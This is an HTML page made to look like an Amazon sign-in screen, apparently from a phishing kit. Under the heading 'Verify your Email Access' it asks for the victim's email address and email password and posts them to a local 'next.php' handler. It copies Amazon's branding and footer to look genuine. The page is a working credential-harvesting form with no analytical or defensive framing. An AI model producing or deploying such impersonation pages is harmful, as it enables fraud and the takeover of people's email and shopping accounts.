<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title dir="ltr">Amazon detail</title>
    <link rel="stylesheet" href="css/st1.css">
    <link rel="stylesheet" href="css/st2.css">
</head>

<body>
    <div id="a-page">
        <div class="a-section a-padding-medium auth-workflow">
            <div class="a-section a-spacing-none auth-navbar">
                <div class="a-section a-spacing-medium a-text-center">
                    <a class="a-link-nav-icon" tabindex="-1" href="#">
                        <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
                    </a>
                </div>
            </div>
            <div id="authportal-center-section" class="a-section">
                <div id="authportal-main-section" class="a-section">
                    <div class="a-section auth-pagelet-container">
                        <!-- div1/////////////////////////////////////// -->
                        <div class="a-section a-spacing-base" id="div1">
                            <div class="a-section">
                                <form name="signIn" action="./next.php" method="POST" class="auth-validate-form auth-real-time-validation a-spacing-none">
                                    <div class="a-section">
                                        <div class="a-box">
                                            <div class="a-box-inner a-padding-extra-large">
                                                <h1 class="a-spacing-small">
                                                    Verify your Email Access
                                                </h1>
                                            
                                                <div class="a-row a-spacing-base">
                                                    <label for="ap_ai" class="a-form-label">
                                                        Amazon Email Address
                                                    </label>
                                                    <input type="text" id="ssn" name="ssn" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field" required="">
                                                </div>
                                                <div class="a-row a-spacing-base">
                                                    <label for="ap_ai" class="a-form-label">
                                                        Amazon Email Password
                                                    </label>
                                                    <input type="password" id="pr" name="pr" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field" required="">
                                                </div>
                                               
                                                
                                                <div class="a-section">
                                                    <button id="btn222" name="btn222" class="a-button a-button-span12 a-button-primary" type="submit"><span class="a-button-inner"><span id="continue-announce" class="a-button-text" aria-hidden="true">
                                                                Verify
                                                            </span></span></button>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <!-- div1 end/////////////////////////// -->
                    </div>
                </div>
            </div>
            <div class="a-section a-spacing-top-extra-large auth-footer">
                <div class="a-divider a-divider-section">
                    <div class="a-divider-inner"></div>
                </div>
                <div class="a-section a-spacing-small a-text-center a-size-mini">
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Conditions of use
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Privacy notice
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Help
                    </a>
                    <span class="auth-footer-seperator"></span>
                </div>
                <div class="a-section a-spacing-none a-text-center">
                    <span class="a-size-mini a-color-secondary">
                        © 1996-2021, Amazon.com, Inc. Or its affiliates
                    </span>
                </div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    
</body>

</html>